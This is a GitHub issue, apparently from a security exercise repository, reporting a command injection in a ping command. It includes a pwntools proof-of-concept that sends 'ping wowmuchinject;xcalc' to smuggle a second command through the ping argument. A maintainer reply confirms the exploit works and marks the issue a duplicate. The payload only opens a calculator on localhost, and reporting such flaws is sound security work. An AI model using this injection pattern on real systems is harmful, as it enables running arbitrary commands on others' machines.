Command Injection - Ping Command #5
Labels
duplicate
This issue or pull request already exists
Comments
You are correct, there is indeed a vulnerability in the ping command and we certifiy that your exploit works. 🥇This is a duplicate issue as #3 |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
I am able to open a calculator when executing the ping command.
Here's a PoC:
'''
This script should be put in yannvonn/grass/ directory and run from there.
This script works on freshly restarted Kali Linux 64 bit VM.
Do not forget to make before running script.
Target: https://github.com/yannvon/grass
Exploit: Command Injection - Open calc through ping command
You can also run this by hand by doing:
make
./bin/server
./bin/client 127.0.0.1 1337
login u1
pass p1
ping wowmuchinject.com;xcalc
'''
from pwn import *
server_bin = './bin/server'
client_bin = './bin/client'
IP = "127.0.0.1"
PORT = "1337"
LOGIN = "login u1"
PASS = "pass p1"
CMD = "ping wowmuchinject;xcalc"
server = process(server_bin)
client = process([client_bin, IP,PORT])
client.sendline(LOGIN)
client.sendline(PASS)
client.sendline(CMD)
print("SERVER: {}".format(server.recvall()))
The text was updated successfully, but these errors were encountered: